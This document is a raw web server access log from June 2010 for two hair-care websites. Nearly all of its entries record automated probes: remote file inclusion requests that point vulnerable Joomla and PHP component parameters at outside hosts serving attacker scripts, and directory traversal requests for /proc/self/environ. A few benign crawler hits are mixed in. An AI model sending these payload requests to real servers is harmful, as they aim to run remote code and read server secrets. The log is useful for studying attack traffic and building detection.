68.168.223.135 - - [27/Jun/2010:20:54:59 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.191.139.210 - - [27/Jun/2010:20:55:15 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.191.139.210 - - [27/Jun/2010:20:55:15 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.191.139.210 - - [27/Jun/2010:20:55:15 -0700] "GET /logs/access_100614.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.191.139.210 - - [27/Jun/2010:20:55:25 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.191.139.210 - - [27/Jun/2010:20:55:25 -0700] "GET /logs/access_100614.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.191.139.210 - - [27/Jun/2010:20:55:25 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.15.152.183 - - [27/Jun/2010:20:58:13 -0700] "GET /index.php?option=com_fabrik&vi...rik=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
213.165.85.241 - - [27/Jun/2010:21:01:30 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
195.20.196.20 - - [27/Jun/2010:21:02:35 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:21:02:35 -0700] "GET /logs/access_100614.log/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:21:02:36 -0700] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
79.170.195.103 - - [27/Jun/2010:21:02:53 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
195.20.196.20 - - [27/Jun/2010:21:04:31 -0700] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:21:04:31 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:21:04:31 -0700] "GET /logs/access_100614.log/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
82.194.70.248 - - [27/Jun/2010:21:05:18 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
82.194.70.248 - - [27/Jun/2010:21:05:18 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
82.194.70.248 - - [27/Jun/2010:21:05:18 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
213.165.85.241 - - [27/Jun/2010:21:18:37 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
213.165.85.241 - - [27/Jun/2010:21:18:37 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
213.165.85.241 - - [27/Jun/2010:21:18:38 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
91.121.67.226 - - [27/Jun/2010:21:36:13 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.67.226 - - [27/Jun/2010:21:36:18 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.67.226 - - [27/Jun/2010:21:36:24 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.67.226 - - [27/Jun/2010:21:39:12 -0700] "GET /logs/access_100614.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.67.226 - - [27/Jun/2010:21:39:12 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.67.226 - - [27/Jun/2010:21:39:13 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.67.226 - - [27/Jun/2010:21:41:53 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.67.226 - - [27/Jun/2010:21:41:53 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.67.226 - - [27/Jun/2010:21:41:54 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.67.226 - - [27/Jun/2010:21:42:31 -0700] "GET /logs/access_100621.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.67.226 - - [27/Jun/2010:21:42:31 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.67.226 - - [27/Jun/2010:21:42:31 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.67.226 - - [27/Jun/2010:21:43:33 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
66.191.139.210 - - [27/Jun/2010:21:46:11 -0700] "GET /logs/access_100614.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.191.139.210 - - [27/Jun/2010:21:46:11 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.191.139.210 - - [27/Jun/2010:21:46:11 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.191.139.210 - - [27/Jun/2010:21:46:12 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.191.139.210 - - [27/Jun/2010:21:46:12 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.191.139.210 - - [27/Jun/2010:21:46:12 -0700] "GET /logs/access_100614.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
68.168.223.135 - - [27/Jun/2010:21:46:52 -0700] "GET /logs/access_100614.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
68.168.223.135 - - [27/Jun/2010:21:46:52 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
68.168.223.135 - - [27/Jun/2010:21:46:52 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.115.6.16 - - [27/Jun/2010:21:54:10 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "freehairsecrets.com"
85.223.63.220 - - [27/Jun/2010:21:54:43 -0700] "GET /logs/access_100104.log//include/write.php?dir=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
85.223.63.220 - - [27/Jun/2010:21:54:43 -0700] "GET /include/write.php?dir=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
85.223.63.220 - - [27/Jun/2010:21:54:44 -0700] "GET /logs//include/write.php?dir=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
85.223.63.220 - - [27/Jun/2010:21:59:34 -0700] "GET /logs//include/write.php?dir=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
85.223.63.220 - - [27/Jun/2010:21:59:34 -0700] "GET /include/write.php?dir=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
85.223.63.220 - - [27/Jun/2010:22:01:24 -0700] "GET /include/write.php?dir=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
85.223.63.220 - - [27/Jun/2010:22:02:55 -0700] "GET /logs/access.log//include/write.php?dir=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
85.223.63.220 - - [27/Jun/2010:22:02:55 -0700] "GET /include/write.php?dir=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
85.223.63.220 - - [27/Jun/2010:22:02:55 -0700] "GET /logs//include/write.php?dir=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
85.223.63.220 - - [27/Jun/2010:22:03:39 -0700] "GET /include/write.php?dir=http://www.bmicg.com/logs/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
195.191.40.23 - - [27/Jun/2010:22:29:00 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)" "growlonghairfast.com"
195.191.40.23 - - [27/Jun/2010:22:29:01 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)" "growlonghairfast.com"
68.168.223.135 - - [27/Jun/2010:22:29:37 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
68.168.223.135 - - [27/Jun/2010:22:29:37 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
68.168.223.135 - - [27/Jun/2010:22:29:37 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
68.168.223.135 - - [27/Jun/2010:22:30:01 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
68.168.223.135 - - [27/Jun/2010:22:30:01 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
68.168.223.135 - - [27/Jun/2010:22:30:01 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.191.139.210 - - [27/Jun/2010:22:30:22 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.191.139.210 - - [27/Jun/2010:22:30:22 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.191.139.210 - - [27/Jun/2010:22:30:22 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
68.168.223.135 - - [27/Jun/2010:22:30:31 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
68.168.223.135 - - [27/Jun/2010:22:30:31 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
68.168.223.135 - - [27/Jun/2010:22:30:31 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.115.111.248 - - [27/Jun/2010:22:30:47 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
66.191.139.210 - - [27/Jun/2010:22:31:32 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.191.139.210 - - [27/Jun/2010:22:31:32 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.191.139.210 - - [27/Jun/2010:22:31:32 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
88.86.106.79 - - [27/Jun/2010:22:32:47 -0700] "GET /skin/zero_vote/setup.php?dir=http://www.bellagemsjewelry.com/images/attributes/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
93.186.192.124 - - [27/Jun/2010:22:38:56 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:22:38:56 -0700] "GET /logs/access_100426.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:22:38:56 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:22:39:08 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:22:39:08 -0700] "GET /logs/access_100426.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:22:39:08 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:22:39:29 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:22:39:29 -0700] "GET /logs/access_100426.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:22:39:30 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.37.176 - - [27/Jun/2010:22:39:31 -0700] "GET /logs/access_091228.log HTTP/1.0" 200 636872 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:22:39:36 -0700] "GET /logs/access_100426.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:22:39:46 -0700] "GET /logs/access_100426.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [27/Jun/2010:22:39:54 -0700] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.30.129.57 - - [27/Jun/2010:22:39:54 -0700] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.30.129.57 - - [27/Jun/2010:22:39:54 -0700] "GET /logs/access.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.186.192.124 - - [27/Jun/2010:22:40:00 -0700] "GET /logs/access_100104.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:22:40:11 -0700] "GET /logs/access_100426.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:22:40:18 -0700] "GET /logs/access_100104.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:22:40:30 -0700] "GET /logs/access_100104.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:22:40:57 -0700] "GET /logs/access_100614.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:22:41:02 -0700] "GET /logs/access_100607.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:22:41:12 -0700] "GET /logs/access_100614.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.115.111.245 - - [27/Jun/2010:22:41:12 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [27/Jun/2010:22:41:12 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
93.186.192.124 - - [27/Jun/2010:22:41:18 -0700] "GET /logs/access_100607.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:22:41:45 -0700] "GET /logs/access_091228.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [27/Jun/2010:22:41:45 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.30.129.57 - - [27/Jun/2010:22:41:46 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.30.129.57 - - [27/Jun/2010:22:41:47 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.186.192.124 - - [27/Jun/2010:22:41:47 -0700] "GET /logs/access_100614.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [27/Jun/2010:22:41:51 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.30.129.57 - - [27/Jun/2010:22:41:51 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.30.129.57 - - [27/Jun/2010:22:41:52 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.186.192.124 - - [27/Jun/2010:22:41:54 -0700] "GET /logs/access_100607.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:22:41:55 -0700] "GET /logs/access_100510.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:22:42:05 -0700] "GET /logs/access_091228.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:22:42:18 -0700] "GET /logs/access_100510.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [27/Jun/2010:22:42:26 -0700] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.30.129.57 - - [27/Jun/2010:22:42:27 -0700] "GET /logs/access.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.30.129.57 - - [27/Jun/2010:22:42:28 -0700] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.186.192.124 - - [27/Jun/2010:22:42:33 -0700] "GET /logs/access_091228.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
